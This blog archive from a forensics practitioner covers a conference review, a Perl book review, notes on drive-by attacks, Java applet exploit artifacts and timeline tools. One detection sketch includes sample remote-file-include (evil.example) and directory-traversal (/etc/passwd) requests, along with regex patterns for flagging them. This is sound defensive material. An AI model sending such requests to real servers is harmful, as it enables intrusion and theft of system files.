PFIC 2011 Review

Monday, November 14, 2011 Posted by Corey Harrell
Last week I had the opportunity to attend Paraben’s Forensic Innovations Conference (PFIC). I had a great time at PFIC, from the bootcamp to the sessions to the networking opportunities. Harlan posted his experience about PFIC, Girl Unallocated shared her thoughts, and SANS Digital Forensic Case Leads discussed the conference as well. The angle I’m going to take in my post is more of a play-by-play about the value PFIC offers and how the experience will immediately impact my work. Here are a few of my thoughts…

Affordability

When I’m looking at conferences and training, cost is one of the top two things I consider. This is especially true if I’m going to ask my employer to pick up the tab. As with many organizations, it is extremely hard to get travel approved through mine. As a public sector employee, at times it seems like I’d have better odds getting someone’s firstborn than getting a request approved through the finance office. The low cost to attend PFIC made it easier for me to get people to sign off on it. The conference with one day of training was only $400. The location was the Canyons Resort, and attendees got cheaper rates for lodging since it’s the off-season. Rounding out the price tag were the flight and the shuttle from the airport; both expenses were fairly reasonable. Don’t be fooled by the low cost into thinking PFIC is the equivalent of a fast food restaurant while the other conferences are fine dining. PFIC is not only an economical choice, but the content covered in the bootcamp and sessions results in more bang for the buck. I like to think PFIC is the equivalent of fine dining with coupons. The cost was so reasonable that I was even going to swing the conference myself if my employer denied my request to attend. That’s how much value I saw in the price tag, especially when I compared it to other DFIR conferences.

Networking Opportunities

The one commonality I’ve seen in others’ feedback about PFIC is how the smaller conference size provides opportunities to network with speakers and other practitioners. This was my first DFIR conference so I can’t comment on conference sizes. However, I agree about the ability to talk with people from the field. Everyone was approachable during the conference without having to wait for crowds to disperse. Plus, if for some reason you were unable to connect between sessions, PFIC had evening activities such as a casino night and a night out in town. I met some great people at the conference and was finally able to meet a few people I had only talked to online. Going into the conference I underestimated the value of connecting with others since I was so focused on the content.

Content

Let’s be honest. A conference can be affordable and offer great networking opportunities, but if the content is not up to par then the conference will be a waste of time and money. I have a very simple way to judge content: it should benefit my work in some way. This means none of the following would fit the bill: academics discussing interesting theories that have no relevance to my cases, vendors pimping some product as the only way to solve an issue, or presenters discussing a topic at such a high level that there is no useful information I can apply to my work. One thing I noticed about the PFIC presenters was that they are practitioners in the field discussing techniques and tools they used to address an issue. I walked away from pretty much every session feeling like I learned a few useful things and got a few ideas to research further. Harlan said in his PFIC 2011 post that “there were enough presentations along a similar vein that you could refer back to someone else's presentation in order to add relevance to what you were talking about”. I think the same thing can be said from the attendee’s perspective. I sat through several presentations on incident response and mobile devices, and it seemed as if the presentations built on one another.

I pretty much picked my sessions based on a topic I wanted to know more about (incident response) and another topic I wanted exposure to (mobile devices). There were a few presentations I picked based on the presenter, but for the most part my focus was on incident response and mobile devices. PFIC had a lot more to offer, including e-discovery, legal issues, and digital forensics topics, but I decided to focus on two specific topics. In the end I’m glad I did, since each presentation discussed a different area of the topic, which gave me a better understanding. I’m not discussing every session I attended, but I wanted to reflect on a few.

        Incident Response

I started PFIC by attending the Incident Response bootcamp taught by Ralph Gorgal. An overview of the process covered in the session is shown below; the activities highlighted in red are what the bootcamp focused on (everything to the right of the arrows are my notes about the activity).

     * Detection => how were people made aware
     * Initial Response => initial investigation, interviews, review detection evidence, and facts that incident occurred
     * Formulate Investigation/Collection Strategy => obtain network topology and operating systems in use
     * Identify Location of Relevant Evidence => determine sources locations, system policies, and log contents
     * Evidence Preservation => physical images, logical images, and archive retrieval
     * Investigation
     * Reporting

The approach taken was for us to simulate walking in to a network and trying to understand the network and what logs were available to us. To accomplish that we reviewed servers’ configurations, including the impact different configuration settings have, and identified where the servers were storing their logs. The Windows services explored during the bootcamp were: Active Directory, Terminal Services, Internet Information Services (IIS), Exchange, SQL Server, and ISA Server. The focus was more on following a logical flow through the network (I thought it was similar to the End to End Digital Investigation) and thinking about what kind of evidence is available and where it is located.
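The “identify where the logs live” step lends itself to scripting. Below is a minimal Python sketch along those lines; the candidate paths are illustrative era defaults I chose for the example (real deployments often relocate logs), and the function simply reports which candidates exist under a given system root:

```python
import os

# Illustrative default log locations for a Windows XP/2003-era system;
# real deployments frequently relocate these, so treat this map as a starting point.
CANDIDATE_LOGS = {
    "IIS (W3SVC)": r"WINDOWS\system32\LogFiles\W3SVC1",
    "Windows event logs": r"WINDOWS\system32\config",
    "SQL Server errorlog": r"Program Files\Microsoft SQL Server\MSSQL\LOG",
}

def locate_logs(system_root):
    """Report which candidate log locations exist under the given system root."""
    found = {}
    for name, rel in CANDIDATE_LOGS.items():
        # split on backslashes so the sketch also runs against images
        # mounted on a non-Windows analysis machine
        path = os.path.join(system_root, *rel.split("\\"))
        found[name] = path if os.path.isdir(path) else None
    return found
```

Pointing system_root at a mounted image gives a quick first pass before manually reviewing each server’s configuration for relocated logs.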

The bootcamp provided a thorough explanation of the thought process behind conducting log analysis during incident response. Even though the course didn’t touch on how to perform the log analysis, other sessions offered at PFIC filled the void. The first was We’re infected, now what? How can logs provide insight? presented by David Nardoni and Tomas Castrejon. The session started out by explaining what logs are, breaking down the different types of logs (network, system, security, and application), and explaining what the different log types can tell you. The rest of the session focused on using the free tools Splunk and Mandiant’s Highlighter to examine firewall and Windows event logs. I thought the presentation was put together well, and the hands-on portion examining actual logs reinforced the information presented to us.

The other session I attended about log analysis was Log File Analysis in Incident Response presented by Joe McManus. The presentation covered how web server and proxy logs can generate leads about an incident using the open source Log Analysis Tool Kit (LATK). LATK helps automate log analysis by quickly showing indicators such as top downloaders/uploaders, SQL queries, and vulnerable web page access. The session was a lab, and in the hands-on portion we examined web server and proxy logs. This was another session that was well put together, and I think the coolest thing about both sessions, besides the great information shared, was that free tools were used to perform the log analysis.
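The “top downloaders” style of indicator that LATK surfaces is straightforward to compute yourself. Here is a minimal Python sketch (not LATK itself) that sums response bytes per client IP in Common Log Format entries; the sample lines are made up:

```python
import re
from collections import Counter

# Common Log Format: ip ident user [timestamp] "METHOD path proto" status bytes
LOG_RE = re.compile(r'^(\S+) \S+ \S+ \[[^\]]+\] "(\S+) (\S+) [^"]*" (\d{3}) (\d+|-)')

def top_downloaders(lines, n=3):
    """Sum response bytes per client IP and return the top n talkers."""
    totals = Counter()
    for line in lines:
        m = LOG_RE.match(line)
        if not m:
            continue  # skip malformed entries instead of aborting the pass
        ip, _method, _path, _status, size = m.groups()
        if size != "-":
            totals[ip] += int(size)
    return totals.most_common(n)

# Made-up sample entries
sample = [
    '10.0.0.5 - - [16/Oct/2011:10:00:01 -0400] "GET /report.pdf HTTP/1.1" 200 500000',
    '10.0.0.5 - - [16/Oct/2011:10:00:09 -0400] "GET /db.bak HTTP/1.1" 200 900000',
    '10.0.0.9 - - [16/Oct/2011:10:01:22 -0400] "GET /index.html HTTP/1.1" 200 4000',
]
print(top_downloaders(sample))  # 10.0.0.5 tops the list at 1,400,000 bytes
```

The same counting approach extends to top uploaders (sum request sizes instead) or most-requested pages (count paths instead of bytes).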

        Mobile Devices

Mobile devices are a topic I want to become more knowledgeable about. I went into PFIC wanting to gain a basic understanding of the forensic value contained in mobile devices and get some hands-on experience examining them.

The first of the three Paraben labs I attended was Smartphone and Tablet Forensic Processing by Amber Schroader. This wasn’t my scheduled lab so I watched from the back as others did the hands-on portion. Amber laid out a case study in which the attendees had to locate a missing 15 year old girl by using Device Seizure to examine an iPad and an iPod touch. What I liked about the session was that answers weren’t provided to the audience, which forced them to figure out what information on those devices could help locate the girl. A few of the areas examined included: Safari browsing history, Safari download history, YouTube history, FaceTime history, Wi-Fi locations, and pictures. After the case study Amber laid out the different areas on mobile devices containing relevant information, but mentioned the biggest issue with mobiles is the sheer number of apps, which changes how you look at your data.

The next Paraben lab I sat through was Physical Acquisitions of Mobiles by Diane Barrett. The session explained the different methods to acquire a physical image: chip-off, the JTAG test access port, flasher boxes, and logical software that can do physical acquisitions. The cool part about the session was the hands-on portion, since we used a Tornado flasher box and Device Seizure to acquire a physical image from a Motorola phone.

The last Paraben lab I attended was Introduction to Device Seizure by Amber Schroader and Eric Montellese. As the title indicates, the session was an introduction to how Device Seizure can be used to examine mobile devices. The entire session was pretty much hands-on; we performed logical and physical acquisitions of a Motorola phone and a logical acquisition of an Android. We also briefly examined both devices to see what information was available.

The only non-Paraben session about mobile devices I attended was iOS Forensics by Ben Lemere. The presentation discussed how to perform forensics on iOS devices using free tools. The information provided was interesting and added to my to-do list, but I thought the session would have been better if it had been a lab. It would have been awesome to try out the stuff the presenter was talking about.

        Digital Forensic Topics

I couldn’t come up with a better description than Digital Forensic Topics for the sessions I picked based on the presenter or topic. The one session I wanted to mention in this category was Scanning for Low Hanging Fruit in an Investigation by Harlan Carvey. I was really interested in attending Harlan’s session so I could finally see the forensic scanner he has been talking about. Out of all the sessions I attended, I think this was the only one where I already knew about the topic being discussed (I follow Harlan’s blog and he has been discussing his forensic scanner). Harlan explained how the scanner is an engine that runs a series of checks searching for low-hanging fruit (known artifacts on the system). The usage scenario he laid out involves:

     * Mount an acquired image as a volume (or mount a volume shadow copy)
     * Plug-ins (checks) are based on a specific usage profile
     * Scanner reports are generated, including a log of activity (analyst's name, image details, plugins run, etc.)

Harlan mentioned the scanner is still in development, but he still did a tool demo by parsing a system’s Windows folder. A few things I noted about what I saw: there’s better documentation than RegRipper (analyst's name and platform included), it still rips registry keys, lists files in a directory (Prefetch folder contents were shown), runs external programs (evt.pl was executed), hashes files, and performs different file checks. I saw the value in this kind of tool before I sat through the session, but seeing it in action reinforced how valuable this capability would be. I currently try to mimic some of these activities with batch scripting (see my triage post or obtaining information post). Those scripts took some time to put together and would require some work to make them do something else. I can foresee the forensic scanner handling this in a few seconds since plugins would just need to be selected; plus the scanner can do things that are impossible with batch scripting.
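Harlan’s scanner is his own code and wasn’t released at the time, so the following is only a Python sketch of the general engine-plus-plugins pattern he described: each plugin is a check run against a mounted image root, and the engine records an activity log alongside the results. The plugin names and paths here are illustrative, not his.

```python
import os

def list_prefetch(root):
    """Plugin: list the contents of the Prefetch folder (classic low-hanging fruit)."""
    pf = os.path.join(root, "WINDOWS", "Prefetch")
    return sorted(os.listdir(pf)) if os.path.isdir(pf) else []

def find_temp_jars(root):
    """Plugin: flag cached JAR files left behind in temp folders."""
    hits = []
    for dirpath, _, files in os.walk(root):
        hits.extend(os.path.join(dirpath, f) for f in files if f.startswith("jar_cache"))
    return hits

PLUGINS = {"prefetch": list_prefetch, "temp_jars": find_temp_jars}

def scan(root, analyst, selected):
    """Engine: run the selected plugins against a mounted image and log the activity."""
    results = {name: PLUGINS[name](root) for name in selected}
    log = {"analyst": analyst, "image_root": root, "plugins_run": list(selected)}
    return results, log
```

Adding a new check is just another function plus a dictionary entry, which is what makes this approach so much faster to extend than one-off batch scripts.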

Speaking of scripts… Harlan mentioned during his presentation a batch script I put together that runs RegRipper across every volume shadow copy (VSC) on a system. I was caught a little off guard since I never imagined Harlan mentioning my work during his presentation. I probably didn’t do a good job explaining the script during the session since I wasn’t expecting to talk about it, so here is some information about it. As Harlan mentioned, I added functionality to the script besides running RegRipper (I still have a standalone script for RegRipper in case anyone doesn’t want the other functions). The script can identify the differences between VSCs, hash files in VSCs, extract data from VSCs (preserving timestamps and NTFS permissions), and list files in a VSC. The script demonstrates that you can pretty much do as you please with VSCs whether you are examining a forensic image or a live system. In a few weeks I’ll provide a little more information about the script and why I wrote it, and over the next few months I’ll write a series of posts explaining the logic behind the script before I release it.
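The actual script is Windows batch and will be covered in later posts, so here is only a Python sketch of the core idea: for each shadow copy, link the GLOBALROOT shadow-copy device to a normal path and run RegRipper against a hive inside it. The tool path, user profile, and link locations are hypothetical placeholders; the sketch builds the command lines without executing anything.

```python
def vsc_commands(vsc_numbers, rip_path=r"C:\tools\rip.exe", user="target"):
    """Build per-shadow-copy command lines: symlink the VSC device, then rip
    the NTUSER.DAT hive inside it. All paths are illustrative placeholders."""
    cmds = []
    for n in vsc_numbers:
        device = rf"\\?\GLOBALROOT\Device\HarddiskVolumeShadowCopy{n}"
        link = rf"C:\vsc{n}"
        # mklink needs the trailing backslash on the device path
        cmds.append(rf"mklink /D {link} {device}" + "\\")
        cmds.append(rf"{rip_path} -r {link}\Documents and Settings\{user}\NTUSER.DAT -f ntuser")
    return cmds

for c in vsc_commands([1, 2]):
    print(c)
```

Looping the same way over diff, hash, or copy commands is how the script’s other functions (differences, hashing, extraction, file listing) can fit the same skeleton.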

PFIC Summary

Overall PFIC was a great experience. I learned a lot, I have a to-do list outlining the various things to research and test further, and I met some great people. The return on investment for my employer sending me to the conference is that in a few weeks I’ll be able to perform log analysis, I’m more knowledgeable about mobile device forensics, and if I get into a jam I now have a few people I can reach out to for help.

Closing out my post, I wanted to share a few thoughts for improvement. I didn’t have many, which I guess is a good thing. ;)

1. Make the names on the name tags bigger. I think my biggest struggle during the conference was trying to figure out people’s names since I couldn’t read the tags.

2. Presenters should answer all questions during the session if time permits, especially if the question is a follow-up to something the presenter said. Another attendee asked a great question, but I had to stick around for about five minutes after the session to hear the answer. It wasn’t like the question was controversial or anything.

3. Verify that all equipment works before the session. One of the labs hit a speed bump when several attendees (me included) couldn’t acquire a phone because several of the phones didn’t work. Everyone was able to do the acquisition eventually, but time was lost finding phones that actually worked.

Book Review Perl Programming for the Absolute Beginner

Monday, October 24, 2011 Posted by Corey Harrell
I find myself in more situations where I’m not completely satisfied with my DFIR tools. They either don’t parse certain information or lack capabilities I want. Batch scripting helped in some situations but the scripts are limited in what I can do. For example, it’s difficult (if not impossible) to create a script to extract information from an artifact that’s not supported by existing tools. Learning a programming language has been at the top of my to-do list for some time due to these reasons. I was browsing my local book store when I came across the book Perl Programming for the Absolute Beginner.

Why Perl Programming for the Absolute Beginner

I chose the book after I skimmed through a few other Perl programming books. Perl Programming for the Absolute Beginner is written for an audience without previous programming experience. The book goes into great detail explaining basic programming concepts such as variables, arrays, loops, and subroutines. I took a C++ course as an undergraduate about seven years ago, and the only thing I remember is that I took a C++ course. Basically, I have zero programming knowledge, including not knowing much about programming concepts. A lot of the books I skimmed, such as Learning Perl, don’t take the time to explain the basic concepts since they expect the reader to already be familiar with them. I wanted a book to explain the basics in addition to the language; Perl Programming for the Absolute Beginner fit the bill.

Numerous books I looked at use exercises at the end of each chapter to reinforce the material covered. The exercises are pretty simple and perform one action such as a math calculation. Perl Programming for the Absolute Beginner takes a different approach to teaching Perl. Instead of individual exercises, the book has the reader write computer games which are fully functioning programs. I thought this approach did a better job of showing how to use Perl since it covers the planning, organizing, coding, and testing activities involved in script development. Plus the approach was entertaining and kept my interest. I’d rather write a “Fortune Teller Game” than a script to compute “the circumference of a circle”. ‘nuff said.

What I learned

My review is going to be a little different. I’m neither discussing the book’s contents (if you want to know then read the table of contents) nor how helpful the book could be. Instead I’m talking about what I learned from the book and how it has impacted my DFIR work so far.

Seeing Behind the Curtain

Bear with me for this analogy… When I was younger I used to love watching Kung-fu movies. At times I watched movies completely in another language without subtitles. I got the gist of what was going on by watching body language, facial expressions, the tones of people’s voices, and the bad guys getting stomped. However, when I watched the same movie in English (subtitled or dubbed) I realized how much I had missed about the movie’s plot. Learning Perl is the equivalent of adding subtitles or an English dub to a Kung-fu movie. Before, I understood the gist of what my Perl tools were doing, but it’s completely different when you can read and actually understand the code to see how it produces its output. It let me see behind the tool abstraction curtain.

Extending my Capability

I was deciding between learning Perl and Python since programs in my toolbox are written in those languages. One of my goals is to learn a language that lets me customize tools to better meet my needs. I picked Perl because two tools I extensively use are written in Perl and are plug-in based. Plug-ins allow a tool to be extended fairly easily, and I felt knowing how to write them would have a greater impact on my DFIR work. My immediate need was a RegRipper plug-in to parse the UserInfo registry key in an NTUSER.DAT hive (I could have asked others for this but I wanted to learn how to do it). In the past I manually examined the UserInfo key in the NTUSER.DAT hive and, if present, the hives in system restore points or volume shadow copies. Performing the task was time consuming but I needed the information. Perl Programming for the Absolute Beginner taught me enough Perl to make it pretty easy to write a plug-in once I re-read the section on creating plug-ins in Windows Registry Forensics. Taking the time to put the userinfo plug-in together will make things easier and faster for me in the future since I can now extract the information from a system in seconds. Talk about improving efficiency.

Breaking my Handcuffs

I’m still wearing handcuffs since I’m still dependent on existing tools and scripts created by others. However, Perl Programming for the Absolute Beginner opened my eyes to a future where, if I encounter an artifact not supported by my tools, I can just write my own. A future where I no longer have to settle for tools’ outputs when I want to see data differently. A future where repetitive tasks can be automated, enabling me to spend more time analyzing information. The book opened my eyes to a world where I don’t have to be handcuffed to my DFIR tools and the capabilities they provide. Perl Programming for the Absolute Beginner did not make me a tool developer, but it provided me with a foundation to build upon.

Four Star Review

Not all is rosy with the book though. I normally can overlook typos, but I’m not very forgiving when there are typos in the code the reader is supposed to copy. It’s bad enough that beginners are going to mess something up and spend time tracking down their own mistakes; there’s no need to add even more typos, leaving people questioning themselves and wondering what else they did wrong. Chapter Four’s Star Wars Quiz declares a variable named $valid but the rest of the program uses the variable $isvalid (on page 129). That small typo makes the game not work until the variable $valid is changed to $isvalid. As a reader I shouldn’t be required to find typos in code in order to make things work; I spend enough time finding my own mistakes as it is.

Overall I give Perl Programming for the Absolute Beginner a four star review (based on Amazon’s rating scheme). I highly recommend the book for anyone looking to learn the Perl programming language in addition to basic programming concepts. The book teaches the basics in an entertaining way, enabling anyone to write simple scripts to solve issues. For those with programming backgrounds, I suggest looking elsewhere for a book on Perl since this one is too basic. Learning Perl is a decent candidate because its target audience is people already familiar with programming concepts (I moved on to this book after reading Perl Programming for the Absolute Beginner).

Linkz about Attacks

Sunday, October 16, 2011 Posted by Corey Harrell
In this round of links I’m talking about drive-bys, malicious ads, web attack artifacts revealed with Mandiant’s Highlighter, and a justification for companies to fail security audits.

Video Showing Drive-by Download from MySQL

As most people have probably heard by now, MySQL.com was serving up malware to its visitors last month. SecurityMonkey put together the post [Video]: Watch Malware Drive-By Download from MySQL.com, which contained various links about the incident. One link was to a video created by Armorize that captured what happened to anyone who visited the website while the issue was occurring. The video is about five minutes long and I highly recommend people check it out. I’ve never seen a drive-by broken down by video before. The video by itself is pretty cool, but I think the true value is in what it shows about the attack vector infecting people visiting the website. Check out the sequence of events I noted from the video:

        -  (00:55) Internet Explorer starts to load the website mysql.com
        -  (01:04) Java.exe starts running on the computer
        -  (01:11) Executables are dropped onto the computer. These were the attack’s payload
        -  (03:43) It was revealed that a Jar file was downloaded to the system and this is why Java started. The Jar file download occurred before the executables appeared on the computer

The attack summary: a user visited mysql.com and eventually got redirected to a site hosting the Blackhole exploit pack. In that instance, the exploit pack used a Java vulnerability to infect the system. Why does any of this even matter? Knowing this can help determine how a system was compromised. Let’s say someone was dealing with an infected computer and trying to figure out how the malware got installed. The video didn’t show what was on the system’s hard drive, but the attack is very similar to the Java exploit artifacts I documented. To date I’ve documented three different ones: Java Signed Applet Exploit Artifacts, CVE-2010-0840 (Trusted Methods) Exploit Artifacts, and CVE-2010-0094 (RMIConnectionImpl) Exploit Artifacts. There was a consistent pattern to all the artifacts:

        -  Temporary file created (Jar file got dropped onto the system)
        -  Indications of a vulnerable Java executing
        -  Internet activity showed a user visited a malicious website

The key difference (besides the Java vulnerability) between the Armorize video and the method I used to document the exploit artifacts was the tool used to create and deliver the exploit. The video documented a Java exploit from the Blackhole exploit pack, and according to Contagio’s August 2011 Exploit Pack Overview spreadsheet, Blackhole goes for $1,500 a year. My testing leveraged the freely available Metasploit to document exploit artifacts. Taking the time to document exploit artifacts can pay big dividends during an examination when trying to determine the “how”. How did the system get infected? Well, if the activity on the system around the time the malware was created shows either a Jar file appearing or Java executing, then a Java vulnerability may have been the culprit. If there is Internet activity, then the Internet and a web browser may have been used to deliver the exploit to the system.
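That consistent pattern can even be expressed as a simple timeline check. The sketch below is illustrative Python, not any released tool; the timeline entries are made-up strings modeled on the artifacts discussed above, and it flags whether each of the three indicators appears within a window around the malware’s creation time:

```python
from datetime import datetime, timedelta

def java_drive_by_indicators(timeline, malware_time, window_minutes=5):
    """Check a (timestamp, description) timeline for the three recurring
    artifacts near the malware creation time: a cached JAR in temp, Java
    executing, and web browser activity."""
    window = timedelta(minutes=window_minutes)
    nearby = [desc.lower() for ts, desc in timeline if abs(ts - malware_time) <= window]
    return {
        "jar_in_temp": any("jar_cache" in d for d in nearby),
        "java_executed": any("java.exe" in d for d in nearby),
        "web_activity": any("visited" in d or "content.ie5" in d for d in nearby),
    }

# Made-up timeline entries modeled on the documented artifacts
t0 = datetime(2011, 9, 26, 14, 0)
timeline = [
    (t0 - timedelta(minutes=2), "IE history: visited hxxp://redirect-site.example"),
    (t0 - timedelta(minutes=1), "Prefetch: JAVA.EXE-0C263507.pf created"),
    (t0 - timedelta(seconds=30), "Temp: jar_cache5490377340104033776.tmp created"),
    (t0, "malware.exe created in user temp"),
]
print(java_drive_by_indicators(timeline, t0))
```

All three flags coming back true doesn’t prove a Java drive-by, but it tells the examiner exactly which artifacts to go look at first.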

Malicious Advertisement Leads to PDF Exploit

I first started looking into attack vector artifacts when one of my systems got whacked with a Fake AV virus. At the time I had the DF skills but I lacked the IR skills, such as figuring out what happened to my system. I took a shot at figuring out how the system became infected to see if I could. It took me a little bit, but I not only found the malware dropped onto my system, I also traced the infection back to Yahoo email. I was even able to determine the exploit used in the drive-by: a malicious PDF file that targeted a vulnerability in Adobe Reader. The PDF appeared in the temporary Internet files folder just prior to the first malware getting dropped. The experience taught me valuable lessons. First, the more obvious one: don’t quickly check your web email from a test system with vulnerable apps, even if it’s only for a few seconds. The second and more important lesson was the need to understand how different attacks appear on a system after they have occurred. The examination took me some time since I didn’t really know what to expect or what artifacts to look for.

I recently came across TrendMicro’s post Malicious Ads Lead to PDF Exploits. The post is from last year, but it made me reflect on the experience that motivated me to start my journey into incident response. The post mentioned how malvertisements on a popular web-based email service led to users being directed to sites with exploits. The article isn’t written from the DFIR perspective since it focused on the vulnerabilities targeted in the attack, and there wasn’t much discussion about the artifacts left on a system besides malicious PDFs and Internet activity. Still, the little information provided did show how the attack occurred.

        -  User visits web based email service
        -  Redirect downloads malicious PDFs targeting Adobe Reader vulnerabilities
        -  Adobe Reader has to process the PDF for the exploit to succeed and install malware

The attack pattern is something I’ve seen in a few other places. My infected test system had the same sequence of events, but it took me a bit to actually see it. That examination made me more aware of the artifacts associated with a PDF exploit, making it easier to spot in a few other examinations I did afterwards. I also saw the same pattern on the test systems I exploited with Metasploit. I researched a PDF exploit in the post CVE-2010-2883 (PDF Cooltype) Exploit Artifacts. Do the following areas I noted in the post look familiar?

        -  PDF document created
        -  There were references about a PDF file being accessed
        -  A vulnerable Adobe Reader started on the system

Web Attack Artifacts

Russ McRee’s October Toolsmith, Log Analysis with Highlighter, is a great read for a couple of reasons. I enjoy reading his articles since he provides an overview of a tool’s functionality, and in this edition he doesn’t disappoint as he covers how to perform log analysis with Mandiant’s Highlighter. Showing how to do log analysis is cool enough, but he demonstrates the tool by looking for attacks in his own website’s logs. He looks for specific artifacts caused by remote file include and directory traversal attacks. I haven’t found any references that document the artifacts left in logs by different attacks, so I enjoyed reading about it. Eventually I’m going to start researching the artifacts left in logs, but I still have a lot to do with the artifacts left on systems.
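As a small illustration of the kind of artifacts Russ hunts for, here is a Python sketch (the patterns and sample lines are my simplified examples, not Highlighter’s logic) that tags log lines showing remote file include or directory traversal attempts:

```python
import re

# Simplified signatures: "../" sequences for traversal, a URL stuffed into a
# query-string parameter for remote file include (RFI)
TRAVERSAL = re.compile(r"\.\./|\.\.%2f", re.IGNORECASE)
RFI = re.compile(r"[?&][^ ]*=(?:https?|ftp)(?::|%3a)//", re.IGNORECASE)

def flag_attacks(lines):
    """Tag each log line with the attack artifacts it shows, if any."""
    flagged = []
    for line in lines:
        tags = []
        if TRAVERSAL.search(line):
            tags.append("traversal")
        if RFI.search(line):
            tags.append("rfi")
        if tags:
            flagged.append((tags, line))
    return flagged

# Made-up request lines
sample = [
    'GET /index.php?page=http://evil.example/shell.txt HTTP/1.1',
    'GET /cgi-bin/view?file=../../../../etc/passwd HTTP/1.1',
    'GET /about.html HTTP/1.1',
]
for tags, line in flag_attacks(sample):
    print(tags, line)
```

Real attacks use heavier encoding than these two patterns catch, so treat the output as leads to eyeball in a tool like Highlighter rather than a verdict.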

Fail a Security Audit Already Will You

When I started working full time in the information security field I was performing vulnerability assessments and security audits. Maybe I’m a little biased because of my background, but I can see the value security audits provide when performed correctly. I’m not talking about audits where boxes are just checked off, but risk-based audits looking at the security controls protecting an organization’s critical information. Andreas M. Antonopoulos's article Fail a security audit already -- it's good for you provides an argument for why companies should fail security audits. The article makes some great points, but the one thing I thought was missing is how organizations try to justify (aka make excuses for) or minimize why serious weaknesses are present. Take patching as an example.

Patching gets skipped to prevent applications and systems from breaking. I was a system admin, so I get it… especially since I’ve dealt with the hassle of tracking down the patches that jacked up my systems. However, using that reason as a justification not to patch, without doing any due diligence by, you know, actually testing patches to see if anything breaks, is something else. The SANS Top Cyber Security Risks report from a few years ago highlighted how third party applications on client systems are targeted. The exploits I discussed in this linkz edition targeted vulnerabilities in client applications such as Java and Adobe Reader. How can these vulnerabilities, on computers with users surfing the web, be lumped into the same category as some application supporting a critical business process, with neither of them getting patched? The security risk didn’t go away and the vulnerabilities don’t magically repair themselves. It’s too late to finally figure this out once the organization is staring at the artifacts from a successful exploit.

Java Signed Applet Exploit Artifacts

Thursday, October 13, 2011 Posted by Corey Harrell
Artifact Name

Java Signed Applet Exploit Artifacts

Attack Vector Category

Exploit

Description

A signed Java applet is presented to a user and a dialog box asks the user if they trust it. If the user is socially engineered into running the applet, arbitrary code executes in the context of the currently logged-on user.

Attack Description

This description was obtained using the Metasploit exploit reference. A user visits a web page hosting the signed Java applet and a Java window pops up asking the user to run the applet. Once the user runs it, a program is downloaded and executed on the system.

Exploits Tested

Metasploit v4.0 multi/browser/java_signed_applet

Target System Information

* Windows XP SP3 Virtual Machine with Java 6 update 16 using administrative user account

* Windows XP SP3 Virtual Machine with Java 6 update 16 using non-administrative user account

Different Artifacts based on Administrator Rights

No

Different Artifacts based on Software Versions

Not tested

Potential Artifacts

The potential artifacts include a Jar file and the changes the exploit causes in the operating system environment. The artifacts can be grouped under the following three areas:

        * Temporary File Creation
        * Indications of the Vulnerable Application Executing
        * Internet Activity

Note: the documentation of the potential artifacts attempts to identify the overall artifacts associated with the vulnerability being exploited, as opposed to the specific artifacts unique to Metasploit. As a result, the actual artifact storage locations and filenames are inside brackets in order to distinguish what may be unique to the testing environment.

        * Temporary File Creation

            - JAR file created in a temporary storage location on the system within the timeframe of interest. [C:/Documents and Settings/Administrator/Local Settings/Temp/jar_cache5490377340104033776.tmp] The contents of the JAR file contained a manifest file, a class file, and an executable.


       * Indications of the Vulnerable Application Executing

           - Log files indicating Java was executed within the timeframe of interest. [C:/Documents and Settings/Administrator/Application Data/Sun/Java/Deployment/deployment.properties, C:/Documents and Settings/Administrator/Local Settings/Temp/java_install_reg.log, and C:/Documents and Settings/Administrator/Local Settings/Temp/jusched.log] The picture below shows the contents of the deployment.properties log.


            - Prefetch files of Java executing. [C:/WINDOWS/Prefetch/JAVA.EXE-0C263507.pf]

            - Registry modification involving Java executing at the same time as reflected in the jusched.log file. [HCU-Admin/Software/JavaSoft/JavaUpdate/Policy/JavaFX]

            - Folder activity involving the Java application. [C:/Program Files/Java, C:/Documents and Settings/Administrator/Application Data/Sun/Java/Deployment/, and C:/Documents and Settings/Administrator/Local Settings/Temp/hsperfdata_username]

        * Internet Activity

            - Web browser history of user accessing websites within the timeframe of interest. [Administrator user account accessed the computer (192.168.11.200) running Metasploit]

            - Files located in the Temporary Internet Files folder. [C:/Documents and Settings/Administrator/Local Settings/Temporary Internet Files/Content.IE5/]

           - Registry activity involving Internet Explorer

Timeline View of Potential Artifacts

The images below show the above artifacts in a timeline of the file system from the Windows XP SP3 system with an administrative user account. The timeline includes the file system, registry, prefetch, event logs, and Internet Explorer history entries.






References

Exploit Information


Metasploit Exploit Information http://www.metasploit.com/modules/exploit/multi/browser/java_signed_applet

Building Timelines – Tools Usage

Sunday, September 25, 2011 Posted by Corey Harrell 3 comments
Tools are defined as anything that can be used to accomplish a task or purpose. For a tool to be effective some thought has to go into how to use it. I have a few saws in my garage but before I try to cut anything with them I first come up with a plan on what I’m trying to accomplish. Timeline tools are no different and their usage shouldn’t solely consist of running commands. The post Building Timelines – Thought Process Behind It discusses an approach to develop a plan on the way timeline tools will be used. This post is the second part, where the tools to build timelines are discussed.

There is not a single tool for building timelines since tools vary based on the DFIR practitioner’s needs and preferences. When I first started learning about timeline analysis I read as much as I could about the technique and downloaded various tools to test their capabilities to see what worked best for me. I’m discussing my current method and a few tools that I build timelines with. The method is different from what I was doing last month and will probably change down the road as tools are updated, new tools are released, and my needs/preferences vary.

I’m trying to show different ways timelines can be built in addition to building my own timeline for an infected Windows XP SP3 test system. The artifacts selected for my timeline are: event logs, Internet Explorer history, XP firewall logs, prefetch files, Windows restore points, select registry keys, entire registry hives, and the file system metadata. The user specific artifacts (i.e. history and registry keys from the NTUSER.DAT hive) only need to be parsed for the administrator user account. The extraction of the timestamps from those artifacts will be accomplished in the following activities:

        -  Artifact Timestamps
        -  File System Timestamps
        -  Registry Timestamps

Tools’ Output

Before a timeline can be created one must first choose what format to use for the tools’ output. Selecting the format up front ensures multiple tools’ outputs can go into the same timeline. Three common output types are: bodyfile, TLN, and comma-separated value (csv). The bodyfile format shows file activity and separates the output into different sections. The version in use will determine what the sections are, but the Sleuthkit Wiki bodyfile page explains the differences and provides an example. The TLN format breaks the data up into five sections: time, source, host, user, and description. Harlan provided a great description of his format in the post Timeline Analysis...do we need a standard? and in the addendum to the post TimeLine Analysis, pt III. The csv format stores data separated by rows and columns. This format works well for viewing the timeline data in spreadsheets. However, unlike the bodyfile and TLN formats, csv is not a standardized format. The csv schema from tools may differ, resulting in the need for additional processing for the outputs to go into the same timeline. Kristinn’s post Timeline Analysis 201 – review the timeline explains the csv schema used in his Log2timeline tool.
